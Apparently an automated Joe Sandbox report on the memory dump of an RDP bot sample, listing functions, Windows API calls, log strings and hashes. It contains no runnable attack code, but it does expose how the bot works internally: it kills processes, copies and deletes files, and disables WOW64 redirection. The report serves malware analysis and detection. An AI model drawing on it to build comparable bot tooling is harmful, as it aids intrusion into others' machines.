Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: _errno
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
API String ID: 2918714741-1991603811
Opcode ID: dc69aec3741024bdd5c98b422f0cf858cad9ef31f093b29afe412604ead822d7
Instruction ID: 4aeaab6dfdda00cea0d0a81dc1e2308040e1023f8f4213583480e74bc32cf70e
Opcode Fuzzy Hash: dc69aec3741024bdd5c98b422f0cf858cad9ef31f093b29afe412604ead822d7
Instruction Fuzzy Hash: C8217121A08647D2E7119F19EA80BAA7371FB6A784F444031FE8C8B664DF3DE845D709

Function 00007FF66EBA2463 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF66EBA2487
strcmp.MSVCRT ref: 00007FF66EBA24CA
OpenProcess.KERNEL32 ref: 00007FF66EBA24E2
TerminateProcess.KERNEL32 ref: 00007FF66EBA24FC
GetLastError.KERNEL32 ref: 00007FF66EBA250A
Process32Next.KERNEL32 ref: 00007FF66EBA26F5
GetLastError.KERNEL32 ref: 00007FF66EBA2704
CloseHandle.KERNEL32 ref: 00007FF66EBA2895

Strings

, xrefs: 00007FF66EBA253C
process_kill, xrefs: 00007FF66EBA2515
[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF66EBA251C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 1211020085-2360327764
Opcode ID: c8db7f8dc37cca4226943fb2b160d2e50fb0551240e109ae70bad1e8909f3973
Instruction ID: c681fbeb7ceec0195ffd1831a0d6935c265a2c6ac720bb2db9ce7960625f0560
Opcode Fuzzy Hash: c8db7f8dc37cca4226943fb2b160d2e50fb0551240e109ae70bad1e8909f3973
Instruction Fuzzy Hash: 7B116D15E49703C7FE554B9AA6D037A26B0EF7F785F040039EE0E8F2A5DE2DE8458209

Function 00007FF66EBA2471 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF66EBA2487
strcmp.MSVCRT ref: 00007FF66EBA24CA
OpenProcess.KERNEL32 ref: 00007FF66EBA24E2
TerminateProcess.KERNEL32 ref: 00007FF66EBA24FC
GetLastError.KERNEL32 ref: 00007FF66EBA250A
Process32Next.KERNEL32 ref: 00007FF66EBA26F5
GetLastError.KERNEL32 ref: 00007FF66EBA2704
CloseHandle.KERNEL32 ref: 00007FF66EBA2895

Strings

, xrefs: 00007FF66EBA253C
process_kill, xrefs: 00007FF66EBA2515
[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF66EBA251C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 1211020085-2360327764
Opcode ID: 66309d14d1d326d562527adad53ed89830da1d68fc8551cf2209a4c90a15a649
Instruction ID: ac31d5f0d0c87b0859797f5abaa0740e8722ac9841e4ed5527369cd7c7dea28b
Opcode Fuzzy Hash: 66309d14d1d326d562527adad53ed89830da1d68fc8551cf2209a4c90a15a649
Instruction Fuzzy Hash: 80116D15E49703C7FE554B9AA2C037A26B0EF7F785F040039EE0E8F6A5DE2DE8458209

Function 00007FF66EBA246A Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF66EBA2487
strcmp.MSVCRT ref: 00007FF66EBA24CA
OpenProcess.KERNEL32 ref: 00007FF66EBA24E2
TerminateProcess.KERNEL32 ref: 00007FF66EBA24FC
GetLastError.KERNEL32 ref: 00007FF66EBA250A
Process32Next.KERNEL32 ref: 00007FF66EBA26F5
GetLastError.KERNEL32 ref: 00007FF66EBA2704
CloseHandle.KERNEL32 ref: 00007FF66EBA2895

Strings

, xrefs: 00007FF66EBA253C
process_kill, xrefs: 00007FF66EBA2515
[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF66EBA251C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 1211020085-2360327764
Opcode ID: 73efa2cca21a3f65b2ca12ddfbb7d997f148a4358ae49dce19075afcf16d6a76
Instruction ID: 6d8bc3c6ec8f411a25937dae650248ee1143d439457ad648e1091386c0fea1db
Opcode Fuzzy Hash: 73efa2cca21a3f65b2ca12ddfbb7d997f148a4358ae49dce19075afcf16d6a76
Instruction Fuzzy Hash: 9A116D15E49703C7FE554B9AA2D037A26B0EF7F785F040039EE0E8F2A5DE2DE8458209

Function 00007FF66EBA255D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF66EBA2487
strcmp.MSVCRT ref: 00007FF66EBA24CA
OpenProcess.KERNEL32 ref: 00007FF66EBA24E2
TerminateProcess.KERNEL32 ref: 00007FF66EBA24FC
GetLastError.KERNEL32 ref: 00007FF66EBA250A
Process32Next.KERNEL32 ref: 00007FF66EBA26F5
GetLastError.KERNEL32 ref: 00007FF66EBA2704
CloseHandle.KERNEL32 ref: 00007FF66EBA2895

Strings

, xrefs: 00007FF66EBA253C
process_kill, xrefs: 00007FF66EBA2515
[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF66EBA251C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 1211020085-2360327764
Opcode ID: 86b99753e098e05f0f7ffa0bcba3c7b746cca72ccffb5fddb95983930b1c7351
Instruction ID: 618e1bb7b66248e8f99f7afd927871058abc972a75a95b1dc8a42c51924c6291
Opcode Fuzzy Hash: 86b99753e098e05f0f7ffa0bcba3c7b746cca72ccffb5fddb95983930b1c7351
Instruction Fuzzy Hash: AC116D15E49703C7FE554B9AA6C037A26B0EF7F785F040039EE0E8F2A5DE2DE8458209

Function 00007FF66EBA5189 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32 ref: 00007FF66EBA5227
GetLastError.KERNEL32 ref: 00007FF66EBA5242

Part of subcall function 00007FF66EBA14E2: fwrite.MSVCRT ref: 00007FF66EBA158E
Part of subcall function 00007FF66EBA14E2: fflush.MSVCRT ref: 00007FF66EBA159A

Strings

[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d), xrefs: 00007FF66EBA53AE
fs_file_copy, xrefs: 00007FF66EBA51F6, 00007FF66EBA5259, 00007FF66EBA53A7
[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu), xrefs: 00007FF66EBA5260
[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x), xrefs: 00007FF66EBA51FD
NULL, xrefs: 00007FF66EBA5385, 00007FF66EBA5391

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: CopyErrorFileLastfflushfwrite
String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
API String ID: 2887799713-3464183404
Opcode ID: 95e60d1554807ebebfb76cb291e6881a049131fb8747bd7af66a248a5116a26e
Instruction ID: da82abe6ed5aea9107df0047d130b5697f8757c5976d7b2a7ec78597233a6b1d
Opcode Fuzzy Hash: 95e60d1554807ebebfb76cb291e6881a049131fb8747bd7af66a248a5116a26e
Instruction Fuzzy Hash: 5A417251D8E616C3FE244649AB403792675FF3ABC8E140532F94FCE694EEACA781870D

Function 00007FF66EBA4BBD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32 ref: 00007FF66EBA4BD4
GetLastError.KERNEL32 ref: 00007FF66EBA4C2B

Strings

[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu), xrefs: 00007FF66EBA4C40
[I] (%s) -> Done(path=%s), xrefs: 00007FF66EBA4D70
NULL, xrefs: 00007FF66EBA4D5A
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4C14
fs_file_delete, xrefs: 00007FF66EBA4C0D, 00007FF66EBA4C39, 00007FF66EBA4D69

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
API String ID: 2018770650-4119452840
Opcode ID: 4a7863b262c50a3dfc82d79fd485e21488a9497198e34933d55e7bd4ef90229e
Instruction ID: bc33d7c39a11b4f47d222c8291c8d9415b419583db0da661e9905420ca935514
Opcode Fuzzy Hash: 4a7863b262c50a3dfc82d79fd485e21488a9497198e34933d55e7bd4ef90229e
Instruction Fuzzy Hash: 03311D55E8C606D3FE60660CA7803B82171DFAF744E950032E95EDF2D1ED5CAD86830A

Function 00007FF66EBA749C Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 157stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF66EBA74D6
strlen.MSVCRT ref: 00007FF66EBA74E1

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA751A, 00007FF66EBA7553, 00007FF66EBA758C
(needle != NULL), xrefs: 00007FF66EBA750C
C:/Projects/rdp/bot/codebase/utils.c, xrefs: 00007FF66EBA7505, 00007FF66EBA753E, 00007FF66EBA7577
(pattern != NULL), xrefs: 00007FF66EBA7545
((match == NULL) || (match_len != NULL)), xrefs: 00007FF66EBA757E
str_match, xrefs: 00007FF66EBA7513, 00007FF66EBA754C, 00007FF66EBA7585

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: strlen
String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$C:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
API String ID: 39653677-892027187
Opcode ID: 27465ba21ad1b9cbb9499f71c393ca0b362acfdfa1ae1babc6372082ad89be41
Instruction ID: 92fe71f6dcdce7e068c6b177469fab630bbecd5fe15f4bfe43fedde235b03160
Opcode Fuzzy Hash: 27465ba21ad1b9cbb9499f71c393ca0b362acfdfa1ae1babc6372082ad89be41
Instruction Fuzzy Hash: 9E51D351E4C563D2FE159A5DAB107B51670FB3B788F484032F90D8F2D8EEACE9058308

Function 00007FF66EBA6C99 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF66EBA6D12
strlen.MSVCRT ref: 00007FF66EBA6D2E
strcat.MSVCRT ref: 00007FF66EBA6D3D
strlen.MSVCRT ref: 00007FF66EBA6D48

Strings

(file_path != NULL), xrefs: 00007FF66EBA6CEE
fs_module_file, xrefs: 00007FF66EBA6CF5
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA6CFC
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF66EBA6CE7

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: strlen$strcat
String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
API String ID: 2335785903-2423714266
Opcode ID: aeaf725b13183e9f8bf21e867b8e19539955e481d57d9fcb69e68115de79d32d
Instruction ID: 0c77334f436cba034cafa94ae89496c71d995cc752c6f52c0e5757985c34c6ae
Opcode Fuzzy Hash: aeaf725b13183e9f8bf21e867b8e19539955e481d57d9fcb69e68115de79d32d
Instruction Fuzzy Hash: 2711A591E48647C5FE115F1D9B453BA26619F2BB84F4C4030FE4D8E28AFE3CD4058348

Function 00007FF66EBACACD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98stringCOMMON

Download Yara Rule

APIs

fwprintf.MSVCRT ref: 00007FF66EBACB20
fwprintf.MSVCRT ref: 00007FF66EBACB34
strlen.MSVCRT ref: 00007FF66EBACB9A

Strings

%*.*S, xrefs: 00007FF66EBACB10
%.*S, xrefs: 00007FF66EBACB2D
%-*.*S, xrefs: 00007FF66EBACB19

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fwprintf$strlen
String ID: %*.*S$%-*.*S$%.*S
API String ID: 2636243462-2115465065
Opcode ID: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
Instruction ID: a4354395e206fe4369be275a7b913da9a8ba84197bd498aeb65bb524a5a0415b
Opcode Fuzzy Hash: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
Instruction Fuzzy Hash: 7331D462E58246C7EF508F29964057862B1EB6EBA4F648131FD0DCF789DE2DE8008F48

Function 00007FF66EBA385C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF66EBA1CF4: LoadLibraryA.KERNEL32 ref: 00007FF66EBA1D02

GetLastError.KERNEL32 ref: 00007FF66EBA38D8

Part of subcall function 00007FF66EBA1C73: GetProcAddress.KERNEL32 ref: 00007FF66EBA1C93

Strings

fs_wow_redir_revert, xrefs: 00007FF66EBA38BB, 00007FF66EBA38E1
[I] (%s) -> %s, xrefs: 00007FF66EBA38C2
Wow64RevertWow64FsRedirection, xrefs: 00007FF66EBA387D
Done, xrefs: 00007FF66EBA38B4
kernel32, xrefs: 00007FF66EBA3869
[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu), xrefs: 00007FF66EBA38E8

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadProc
String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
API String ID: 3511525774-1584720945
Opcode ID: 0d72eef9973f73162af86764223cfd8feda96ec3c76fb34f3754d22987ee77a7
Instruction ID: 458cf73a1137afc00a402dffdc26a3fc97e64c59a67eb6c7f08b535e74be8a98
Opcode Fuzzy Hash: 0d72eef9973f73162af86764223cfd8feda96ec3c76fb34f3754d22987ee77a7
Instruction Fuzzy Hash: 8F11BA60E5D647E2FF559B19AA993B81270AF7B344F440035F40DCE2A1EEADE548C718

Function 00007FF66EBA37C0 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF66EBA1CF4: LoadLibraryA.KERNEL32 ref: 00007FF66EBA1D02

Part of subcall function 00007FF66EBA1C73: GetProcAddress.KERNEL32 ref: 00007FF66EBA1C93

GetLastError.KERNEL32 ref: 00007FF66EBA3820

Part of subcall function 00007FF66EBA14E2: fwrite.MSVCRT ref: 00007FF66EBA158E
Part of subcall function 00007FF66EBA14E2: fflush.MSVCRT ref: 00007FF66EBA159A

Strings

Wow64DisableWow64FsRedirection, xrefs: 00007FF66EBA37D8
[I] (%s) -> %s, xrefs: 00007FF66EBA380A
[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu), xrefs: 00007FF66EBA3830
Done, xrefs: 00007FF66EBA37FC
kernel32, xrefs: 00007FF66EBA37C4
fs_wow_redir_disable, xrefs: 00007FF66EBA3803, 00007FF66EBA3829

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadProcfflushfwrite
String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
API String ID: 1533789296-1853374401
Opcode ID: 9122182cffd4728d3c90ecec1273d3d87b598eef96ed82746b470995d4617c28
Instruction ID: 7afb51d57aa6a46ef12ec263d8d982ce05567474ff7d1b5695e7b8a5e97d2ff8
Opcode Fuzzy Hash: 9122182cffd4728d3c90ecec1273d3d87b598eef96ed82746b470995d4617c28
Instruction Fuzzy Hash: AB019B60E59943E3FE519B19AAD53B81270AF3E304F444436F40DCE2A1EFADE5498708

Function 00007FF66EBA33C0 Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 24COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF66EBA33D8
CloseHandle.KERNEL32 ref: 00007FF66EBA33DE

Strings

process_free, xrefs: 00007FF66EBA3402
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA3409
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF66EBA33F4
(pi != NULL), xrefs: 00007FF66EBA33FB

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: CloseHandle
String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
API String ID: 2962429428-1801624891
Opcode ID: 0fb7cf508a06238d52d9bb688028082a26fb40906e283302dad5f6b1aff35725
Instruction ID: 619523ab917abead5d03a87fc3fb148186711fcd63a9a6c2ef57556ce7bfa261
Opcode Fuzzy Hash: 0fb7cf508a06238d52d9bb688028082a26fb40906e283302dad5f6b1aff35725
Instruction Fuzzy Hash: 53F01C61E5984BC1EE10DB69EEA01A82774FF6A748F540132E90D8F260EE3CD946C308

Function 00007FF66EBA7E04 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32 ref: 00007FF66EBA7E82
GetLastError.KERNEL32 ref: 00007FF66EBA7E90

Strings

path_convert_to_nt, xrefs: 00007FF66EBA7E9B
